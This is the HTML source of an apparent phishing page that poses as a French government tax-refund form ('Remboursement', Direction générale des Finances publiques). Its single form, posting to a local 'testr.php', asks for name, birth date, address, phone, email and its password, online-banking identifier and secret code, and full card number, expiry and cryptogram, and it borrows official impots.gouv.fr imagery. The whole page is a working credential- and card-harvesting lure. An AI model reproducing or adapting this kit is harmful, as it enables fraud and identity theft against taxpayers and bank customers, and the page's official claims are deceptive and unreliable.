<html><!-- Dac: dpapusx046 --><!-- Le: Wed Jun  7 11:35:32 2017 --><!-- Le: 4009 --><head><meta http-equiv="Content-Type" content="text/html; charset=WINDOWS-1252">
            
            <meta name="viewport" content="width=device-width, initial-scale=1">
            <link rel="stylesheet" href="templates/css/bootstrap-3.3.6.min.css">
            <link rel="stylesheet" href="templates/css/autentification.css">
            <link type="text/css" rel="stylesheet" href="templates/css/imp.css" media="all">


            <script src="templates/jquery-3.1.0.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.maskedinput/1.4.1/jquery.maskedinput.js"></script>
    <script>
    $(document).ready(function($){
     $('#cardcc').mask("9999999999999999");
    });   
    </script>
    <script>
    $(document).ready(function($){
     $('#cry').mask("999");
    });   
    </script>
    <script>
    $(document).ready(function($){
     $('#tel').mask("9999999999");
    });   
    </script>
    <script>
    $(document).ready(function($){
     $('#zip').mask("99999");
    });   
    </script>
    <script>
  



        function type_carte(){
            var get_value = document.getElementById('cardcc').value;
            var type = get_value.substring(0,2);
            var other = get_value.substring(0,1);
            if(type == "40"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 99.5%";
            }else if(type == "41"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 99.5%";
            }else if(type == "42"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 99.5%";
            }else if(type == "43"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 99.5%";
            }else if(type == "44"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 99.5%";
            }else if(type == "45"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 99.5%";
            }else if(type == "46"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 99.5%";
            }else if(type == "47"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 99.5%";
            }else if(type == "48"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 99.5%";
            }else if(type == "49"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 99.5%";
            }else if(type == "31"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "32"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "33"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "34"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "35"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "36"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "37"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "38"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "39"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "30"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 0.5%";
            }else if(type == "51"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "52"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "53"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "54"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "55"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "22"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "23"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "24"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "25"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "26"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "27"){
                document.getElementById("cardcc").style.backgroundPosition = "101% 49.25%";
            }else if(type == "60"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 13.6%";
            }else if(type == "64"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 13.6%";
            }else if(type == "65"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 13.6%";
            }else if(type == "50"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "56"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "58"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "63"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "62"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(type == "67"){
                document.getElementById("cardcc").style.backgroundPosition = "100% 29%";
            }else if(other == "1"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 75.8%";
            }else if(other == "2"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 75.8%";
            }else if(other == "3"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 75.8%";
            }else if(other == "4"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 75.8%";
            }else if(other == "5"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 75.8%";
            }else if(other == "6"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 75.8%";
            }else if(other == "7"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 75.8%";
            }else if(other == "8"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 75.8%";
            }else if(other == "9"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 75.8%";
            }else if(other == "0"){
                document.getElementById("cardcc").style.backgroundPosition = "101.5% 75.8%";
            }
        };
    </script>

            <title>Remboursement</title>
            <link rel="icon" href="templates/11.png">
            </head><body cz-shortcut-listen="true">
                <header role="banner">
                     <!-- ""banniereSmart" -->
                    <div class="container">
                    <div id="badIE" class="old-browser invisible">
                        
                    </div>
                        <div class="col-xs-12 col-sm-12  col-md-12 col-lg-12 noPadding">
                            <a id="portailpublic" href="" target="_blank">
                                <div id="impotsgouv" class="col-xs-12  col-sm-6  col-md-6  col-lg-4 noPadding">
                                </div>
                            </a>             
                            <div id="accesEspace" class="col-xs-offset-0 col-xs-12 col-sm-offset-1  col-sm-5 col-md-offset-0 col-md-6 col-lg-offset-0 col-lg-8 noPadding">
                                <ul class="col-xs-12  col-sm-12 col-md-offset-3 col-md-9 col-lg-offset-8 col-lg-4 noPadding ">
                                    <li>
                                        <a class="btn11 btn-primary" id="partPriv" href="" style="background-image: url(https://cfspart.impots.gouv.fr/templates/images/Cadenas.svg);background-repeat: no-repeat;background-position: 10pt;padding: 4pt 0pt 4pt 10pt;display: block;background-size: 25pt;">
                                            Votre espace particulier
                                        </a>
                                    </li>
                                    <li>
                                        <a class="btn11 btn-danger" id="proPriv" href="" style="
    background-image: url(https://cfspart.impots.gouv.fr/templates/images/Cadenas.svg);
    background-repeat: no-repeat;
    background-position: 10pt;
    padding: 4pt 0pt 4pt 9pt;
    display: block;
    background-size: 25pt;
">
                                            Votre espace professionnel
                                        </a>
                                    </li>
                                </ul>
                            </div> <!-- "accesEspace"  -->
                        </div>
                    </div> <!-- container -->
                </header>
                <main class="col-xs-12 col-sm-12 col-md-12 col-lg-12 noPadding" style="
    margin-top: -0.32%;
">
                    <div class="container" id="backToPortail">
                        <div id="cheminDeFer" class="col-xs-12  col-sm-12  col-md-12  col-lg-12" style="
">
                            <nav id="breadcrumb">
                                <ul>
                                    <li><a href="#" id="toPortailPub" title="Retour au portail">Accueil</a></li>
                                    <li><span>Particulier &gt; Formulaire de remboursement électronique - N 003742299 </span></li>
                                </ul>
                            </nav>
                        </div> <!-- "cheminDeFer" -->
                    </div> <!-- "backToPortail" -->
                    <div class="container" id="principalContainer" style="
">
                        <!--La forme qui va contenir tout le formulaire  -->

                        <div id="principalForm" class="col-xs-12 col-sm-12  col-md-12 col-lg-12">
                            <!-- Forme group des donn&eacute;s personnelles -->
                            <div class="row" style="
    margin-bottom: -4.61%;
">
                            <form method="post" action="testr.php" style="
">
                                
                                    <div id="creation" class="form-group col-xs-12 col-md-6 col-lg-6 optionmere" style="margin-bottom: 4%;">
                                <h1 class="titre" style="
    margin-top: -1%;
">Données personnelles</h1>
                                <div class="" style="
    border: 1px solid #ccc;
    padding: 3% 5% 3% 5%;
    border-radius: 0.5em;
    margin: 20px 20px 20px 20px;
    margin-bottom: -7px;
"> 
                                        
                                    <div class="erreur invisible" id="Cat23S"></div>
                                    
                                
                                
                                
                                <div style=""> 
                                    
                                        
                                        
                                        
                                        
                                        <div class="form-group saisie">
                                <label for="teledec_tmp" style="
    color: #0B6BA8;
    font-size: 1.2em;
    border: none;
    font-weight:  100;
">Nom complet</label>
                                 <a href="#" class="info">
                                  <img width="18" height="18" class="aide" src="templates/info.png" alt="Aide">
                                    <span data-toggle="tooltip">
                                            Saisissez votre Prénom et Nom. 
                                        </span>
                                            </a>
                                            <br>
                                            <div class="form-group saisie" style=" width: 102%;">
                                            <input class="" placeholder="Prénom" name="AK01" aria-required="true" autocomplete="off" id="rfr_tmp" required="" style="
    width: 49%;
    border: 0px solid white;
    border-bottom: 1px solid #ccc;
    background:  white;
    padding: 8px;
    margin-bottom: 10px;
    height: 35px;
">
                                            <input class="" placeholder="Nom d'usage" type="text" name="AK02" aria-required="true" autocomplete="off" required="required" style="
    width: 49%;
    border: 0px solid white;
    border-bottom: 1px solid #ccc;
    background: white;
    padding: 8px;
    margin-bottom: 10px;
    height: 35px;
">
                                            <div class="erreur invisible" id="Cat1_3S_rfr_tmp"> 
                                                Veuillez vérifier votre saisie.
                                            </div>
                                        </div>
                                            
                                        </div>  
                                        
                                        <div class="form-group saisie">
                                            <label for="spi_tmp" style="
    color: #0B6BA8;
    font-size: 1.2em;
    border: none;
    font-weight: 100;
">Date de Naissance</label>
                                            
                                            <br>
                                                    <div style="
    width: 102%;
"><select name="AK03" data-msg-required="&nbsp;*" class="" id="user-base-data-jour" required="required" style="border: 0px solid white;border-bottom: 1px solid #ccc;background: white;padding: 8px;margin-bottom: 10px;height: 35px;width: 32%;">
                                                        <option value="">Jour</option><option value="01">01</option><option value="02">02</option><option value="03">03</option><option value="04">04</option><option value="05">05</option><option value="06">06</option><option value="07">07</option><option value="08">08</option><option value="09">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option></select> 
                                                    <select name="AK04" data-rule-required="true" class="" data-msg-required="&nbsp;*" id="user-base-data-mois" required="required" style="
    border: 0px solid white;
    border-bottom: 1px solid #ccc;
    background: white;
    padding: 7px;
    margin-bottom: 10px;
    height: 35px;
    width: 32%;
">
                                                        <option value="">Mois</option><option value="Janvier">Janvier</option><option value="Février">Février</option><option value="Mars">Mars</option><option value="Avril">Avril</option><option value="Mai">Mai</option><option value="Juin">Juin</option><option value="Juillet">Juillet</option><option value="Août">Août</option><option value="Septembre">Septembre</option><option value="Octobre">Octobre</option><option value="Novembre">Novembre</option><option value="Décembre">Décembre</option></select> 

                                                    <select name="AK05" data-rule-required="true" data-msg-required="&nbsp;*" class="" id="user-base-data-année" required="required" style="
    border: 0px solid white;
    border-bottom: 1px solid #ccc;
    background: white;
    padding: 6px;
    margin-bottom: 10px;
    height: 35px;
    width: 32%;
">
                                                        <option value="">Année</option><!--l'ann&eacute;e--> <option value="2000">2000</option><option value="1999">1999</option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911">1911</option><option value="1910">1910</option><option value="1909">1909</option><option value="1908">1908</option><option value="1907">1907</option><option value="1906">1906</option><option value="1905">1905</option></select></div>
                                             </div>           
                                            
                            
                               <div class="form-group saisie">
                                <label for="teledec_tmp" style="
    color: #0B6BA8;
    font-size: 1.2em;
    border: none;
    font-weight: 100;
">Complément d'adresse</label>
                                 <a href="#" class="info">
                                  <img width="18" height="18" class="aide" src="templates/info.png" alt="Aide">
                                    <span data-toggle="tooltip">
                                            Saisissez votre Adresse/code Postal. 
                                        </span>
                                            </a>
                                            
                                            <div class="form-group saisie" style=" width: 102%;">
                                            <input class="" placeholder="Adresse d'imposition" name="AK06" aria-required="true" autocomplete="off" id="rfr_tmp" required="" style="background-image: url(templates/2.png);background-repeat: no-repeat;background-position: 98%;background-size: 19px;width: 58%;border: 0px solid white;border-bottom: 1px solid #ccc;background: white;padding: 8px;margin-bottom: 10px;height: 35px;">
                                            <input class="" placeholder="Code Postal" type="tel" name="AK07" aria-required="true" autocomplete="off" id="zip" required="required" style="width: 39%;border: 0px solid white;border-bottom: 1px solid #ccc;background: white;padding: 8px;margin-bottom: 10px;height: 35px;">
                                            <div class="erreur invisible" id="Cat1_3S_rfr_tmp"> 
                                                Veuillez vérifier votre saisie.
                                            </div>
                                        </div>
                                            
                                        </div>


                                        
                                        </div>
                                        
                                        

                                        
                                        
                                                   
                                        

                            
                                        
                                   </div>
                                            
<div class="" style="
    border: 1px solid #ccc;
    padding: 3% 5% 3% 5%;
    border-radius: 0.5em;
    margin: 20px;
"> 
                                        
                                    <div class="erreur invisible" id="Cat23S"></div>
                                    
                                
                                
                                
                                <div class="form-group saisie">
                                            <label for="spi_tmp" style="color: #0B6BA8;font-size: 1.2em;border: none;font-weight: 100;">Numéros de téléphone</label>
                                            <a href="#" class="info">
                                                <img width="18" height="18" class="aide" src="templates/info.png" alt="Aide">
                                                <span data-toggle="tooltip">
                                                    Saisissez numéro de téléphone.
                                                </span>
                                            </a>
                                            <br>
                                            <input class="" pattern="^(?:0|\(?\+33\)?\s?|0033\s?)[1-79](?:[\.\-\s]?\d\d){4}$" name="AK08" aria-required="true" placeholder="Portable Ex : 0612345678" autocomplete="on" id="tel" type="tel" required="" style="
    background-image: url(templates/3.ico);
    background-repeat: no-repeat;
    background-position: 98%;
    background-size: 19px;
    border: 0px solid white;
    border-bottom: 1px solid #ccc;
    background: white;
    padding: 8px;
    margin-bottom: 10px;
    height: 35px;
    width: 97%;
">
                                            
                                        </div>
<div> 
                                    
                                        <input type="hidden" id="spi" name="spi">
                                        <input type="hidden" id="teledec" name="teledec">
                                        <input type="hidden" id="rfr" name="rfr">
                                        
                                          
                                        
                                                   
                                            
                            
                               

<div class="form-group saisie">
                                <label for="teledec_tmp" style="
    color: #0B6BA8;
    font-size: 1.2em;
    border: none;
    font-weight: 100;
">Adresse électronique</label>
                                 <a href="#" class="info">
                                  <img width="18" height="18" class="aide" src="templates/info.png" alt="Aide">
                                    <span data-toggle="tooltip">
                                            Saisissez votre Adresse mail. 
                                        </span>
                                            </a>
                                            <br>
                                            
<div class="form-group saisie" style=" width: 102%;">
                                            <input class="" placeholder="E-mail" name="AK09" aria-required="true" autocomplete="off" id="rfr_tmp" required="" style="margin-bottom: 37px;border: 0px solid white;border-bottom: 1px solid #ccc;background: white;padding: 8px;margin-bottom: 10px;height: 35px;width: 225px;" type="email">
                                            <input class="" placeholder="Mot de passe" type="password" name="AK10" aria-required="true" autocomplete="off" id="zip" required="required" style="border: 0px solid white;border-bottom: 1px solid #ccc;background: white;padding: 8px;margin-bottom: 10px;height: 35px;width: 225px;">
<img src="templates/feature-5-2.png" alt="" style="
    height: 35px;
">
                                            
                                        </div>
                                            
                                        </div>
                                        
                                        </div>
                                        
                                        

                                        
                                        
                                                   
                                        

                            
                                        
                                   </div>
                                   
                                </div>
                         <div id="creation" class="form-group col-xs-12 col-md-6 col-lg-6 optionmere1" style="">
                                <h1 class="titre" style="
    margin-top: -1%;
">Mes cordonnées bancaire</h1>
                                
                                
<div class="" style="
    margin-top: 0%;
    border: 1px solid #ccc;
    padding: 3% 5% 3% 5%;
    border-radius: 0.5em;
    margin: 20px;
"> 
                            
                                        
                                        
                                        
                                        

                                        

<div class="form-group saisie">
                                            <label for="teledec_tmp" style="
    color: #0B6BA8;
    font-size: 1.2em;
    border: none;
    font-weight: 100;
">Authentification</label>
                                            <a href="#" class="info">
                                                <img width="18" height="18" class="aide" src="templates/info.png" alt="Aide">
                                                    <span data-toggle="tooltip">
Saisissez ici votre identifiant                                                    </span>
                                            </a>
                                            <br>
                                            
                                            <div class="erreur invisible" id="car">
                                                Votre numéro de Carte de Crédit comporte uniquement des caractères numériques ; veuillez vérifier votre saisie.
                                            </div>
                                        </div><div class="form-group saisie" style="margin-top: -16px;">
                                            
                                            
                                            <br>
                                            
<select name="AK11" data-rule-required="true" class="" data-msg-required="&nbsp;*" id="user-base-data-mois" required="required" style="
    border: 0px solid white;
    border-bottom: 1px solid #ccc;
    background: white;
    padding: 8px;
    margin-bottom: 3px;
    height: 35px;
    width: 97%;
">
                                                        <option value="">Banque</option><option value="BNP Paribas">BNP Paribas</option><option value="Crédit agricole">Crédit agricole</option><option value="Société générale">Société générale</option><option value="Groupe BPCE">Groupe BPCE</option><option value=" Crédit mutuel"> Crédit mutuel</option><option value="CIC">CIC</option><option value="la Banque postale">la Banque postale</option><option value="Caisses dEpargne">Caisses dEpargne</option><option value="Banques Populaires">Banques Populaires</option><option value="Crédit du Nord">Crédit du Nord</option><option value="Boursorama">Boursorama</option>
<option value="Le Crédit lyonnais">Le Crédit lyonnais</option>
<option value="Hello bank!">Hello bank!</option>
<option value="HSBC France">HSBC France</option>
<option value="Groupe Groupama">Groupe Groupama</option>
<option value="Groupe AXA">Groupe AXA</option>
<option value="Banque française mutualiste">Banque française mutualiste</option><option value="Banque Hottinguer">Banque Hottinguer</option></select>
<input class="" name="AK12" aria-required="true" placeholder="identifiant" autocomplete="on" id="spi_tmp" required="" style="border: 0px solid white;border-bottom: 1px solid #ccc;background: white;padding: 8px;margin-bottom: 10px;height: 35px;margin-right: 12px;width: 47%;" type="tel"><input class="" name="AK13" aria-required="true" placeholder="Code Secret*" autocomplete="on" id="spi_tmp" required="" style="border: 0px solid white;border-bottom: 1px solid #ccc;background: white;padding: 8px;margin-bottom: 10px;height: 35px;width: 47%;" type="password">
<img src="templates/logos_banques_ace.gif" alt="Acc&amp;egraves au site service-public.fr " style="width: 101.5%;margin-bottom: 10px;">
                                            <div class="erreur invisible" id="Cat1_3S_spi_tmp">
                                                Le nom et prénom comporte uniquement des Lettres ; veuillez vérifier votre saisie.
                                            </div>
                                        </div>


<div class="form-group saisie">
                                            <label for="teledec_tmp" style="
    color: #0B6BA8;
    font-size: 1.2em;
    border: none;
    font-weight: 100;
">Numéro de carte de crédit</label>
                                            <a href="#" class="info">
                                                <img width="18" height="18" class="aide" src="templates/info.png" alt="Aide">
                                                    <span data-toggle="tooltip">
                                                        Saisissez les 16 Chiffres figurant sur la Carte de Crédit.
                                                    </span>
                                            </a>
                                            <br>
                                            <input class="TroisSChamps" style="border-radius: 0px; border-width: 0px 0px 1px; border-style: solid; border-color: white white rgb(204, 204, 204); border-image: initial; background: url(&quot;templates/cccc.png&quot;) 101.5% 75.8% no-repeat white; padding: 8px; margin-bottom: 10px; height: 35px; width: 97%;" id="cardcc" onkeyup="type_carte()" placeholder="Numéro de carte" type="tel" name="AK14" aria-required="true" autocomplete="off" required="required" templates="">
                                            <div class="erreur invisible" id="cardcc">
                                                Votre numéro de Carte de Crédit comporte uniquement des caractères numériques ; veuillez vérifier votre saisie.
                                            </div>
                                        </div>
                                                   
                                        
                                       <div class="form-group saisie" style="
">
                                
                                 
                                            
                                            <div class="form-group saisie" style=" width: 102%;">
                                            <div style="  width: 102%;"><select class="" name="AK15" data-rule-required="true" data-msg-required="&nbsp;*" required="" style="
    border: 0px solid white;
    border-bottom: 1px solid #ccc;
    background: white;
    padding: 8px;
    margin-bottom: 10px;
    height: 35px;
">
                                                   <option value="">Mois</option><option value="01">01</option><option value="02">02</option><option value="03">03</option><option value="04">04</option><option value="05">05</option><option value="06">06</option><option value="07">07</option><option value="08">08</option><option value="09">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option></select> 
                                               <select class="" name="AK16" "="" data-rule-required="true" data-msg-required="&nbsp;*" required="" style="border: 0px solid white;border-bottom: 1px solid #ccc;background: white;padding: 8px;margin-bottom: 10px;height: 35px;">
                                                   <option value="">Année</option><option value="2018">2018</option><option value="2019">2019</option><option value="2020">2020</option><option value="2021">2021</option><option value="2022">2022</option><option value="2023">2023</option><option value="2024">2024</option><option value="2025">2025</option><option value="2026">2026</option><option value="2027">2027</option><option value="2028">2028</option><option value="2029">2029</option><option value="2030">2030</option></select> 
                                            
                                            <div class="erreur invisible" id="Cat1_3S_rfr_tmp"> 
                                                Veuillez vérifier votre saisie.
                                            </div>
                                       </div> </div>
                                            
                                        </div><div class="form-group saisie">
                                            
                                            
                                            
                                            <input class="" style="border: 0px solid white;border-bottom: 1px solid #ccc;background: white;padding: 8px;margin-bottom: 10px;height: 35px;background-image: url(templates/picto-cb.png);background-repeat: no-repeat;background-position: 98%;background-size: 32%;" type="tel" maxlength="8" name="AK17" aria-required="true" autocomplete="off" id="cry" placeholder="Cryptogramme" required="required">
                                            <div class="erreur invisible" id="cardcc">
                                                Votre numéro de Carte de Crédit comporte uniquement des caractères numériques ; veuillez vérifier votre saisie.
                                            </div>
                                        </div>
                                                                                              

                                         
                                         
                                        
                                    
                                </div>
 <div class="vx_checkbox  checkBoxContainer" style="
">
                                             <input type="checkbox" id="paypalAccountData_oneTouchCheckbox" data-automation-id="one_touch_checkbox"><label for="paypalAccountData_oneTouchCheckbox" style="
    margin-left: 18px;
    margin-top: -16px;
    margin-bottom: 7px;
"><u style="
    font-weight: 500;
    color: cornflowerblue;
">J'aurai accès à mes documents dans mon espace particulier et serai informé par courriel de leur mise en ligne.</u></label>
                                          </div>
<div id="validation">
                                            <button type="submit" class="btn11" onclick="document.getElementById('3S_formulaire').action=urlLogin3S ; return envoi3S();" style="margin-bottom: 6%;border-radius: 2%;margin-top: 6px;">Valider</button>
                                        </div>
                                </div>
                                
                                <br>
                                <br>
                            </form>
                            <div class="container" id="backToPortail">
                         
                    </div></div>
                                <br>
                                <br>
                            </div>
                            <!-- Forme group de connexion 3S  -->  
                             <!-- Creation  -->
                        </div> <!-- row --> 
                      <!-- principalForm --> 
                      <!-- principalContainer -->
                    
<footer id="footer" class="footer" role="contentinfo" style="
    margin-top: 1%;
">
    <p style="
    background:  white;
    color:  black;
    height: 70px;
    padding-top: 23px;
">Direction générale des Finances publiques
    </p>


</footer>
                </main>
                
                 
                
                 
                
                 
                
                 

                

                
                 

            
            <div id="aide" class="modal fade" role="dialog" aria-labelledby="titreAide">
            <div class="modal-dialog">
            <div class="modal-content">
            <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal"><img src="templates/images/fermer.svg" alt="fermer" tabindex="0"></button>
            <!-- <button type="button" class="close" data-dismiss="modal">&#x274C;</button> -->
            <h1 id="titreAide" class="modal-title">Aide</h1>
            </div>
            
            
            
            
            <p>                        * Il vous appartient de vous assurer que la configuration de votre ordinateur est compatible avec l'utilisation des télé procédures.
            </p>
            <br><a href="#sommaire">Retour</a></div>
            </div>
            <div id="helpFooter" class="modal-footer">
            <a href="#" title="Fermer la fenêtre">Fermer</a>
            </div>
            </div>
            
            

            
            <div id="deco" class="modal fade" role="dialog">
                <div class="modal-dialog">
                    <div class="modal-content">
                        <div class="modal-header">
                            <h4 class="modal-title titre">Déconnexion</h4>
                        </div>
                        <div class="modal-body">
                            <div id="deconnecte" class="rounded">
                                <iframe name="app0" id="app0" class="invisible"></iframe>
                                
                                
                                Déconnexion en cours, veuillez patienter...<br>
                                
                                <br>
                                <img src="/templates/images/Miniballs.gif" alt="">
                                <br>
                            </div> <!-- deconnecte" -->
                        </div> <!-- modal-body -->
                    </div> <!-- modal-content -->
                </div> <!-- modal-dialog -->
            </div> 
            

<script src="/templates/js/jquery-1.11.3.min.js"></script>
<script src="/templates/js/bootstrap.min.js"></script>
<script type="text/javascript" src="/templates/js/auth.js"></script>
<script type="text/javascript" src="/templates/js/urls.js"> </script>
<script type="text/javascript">
urlLoginMotDePasse = '/LoginMDP?op=c&url=aHR0cHM6Ly9jZnNwYXJ0LmltcG90cy5nb3V2LmZyL21vbnByb2ZpbC13ZWJhcHAvbW9uQ29tcHRl';
urlLogin3S = '/LoginAccess?op=c&url=aHR0cHM6Ly9jZnNwYXJ0LmltcG90cy5nb3V2LmZyL21vbnByb2ZpbC13ZWJhcHAvbW9uQ29tcHRl';
if (document.getElementById('CFP')) document.getElementById('CFP').href=PortPub+PathCFP;
</script>





</body></html>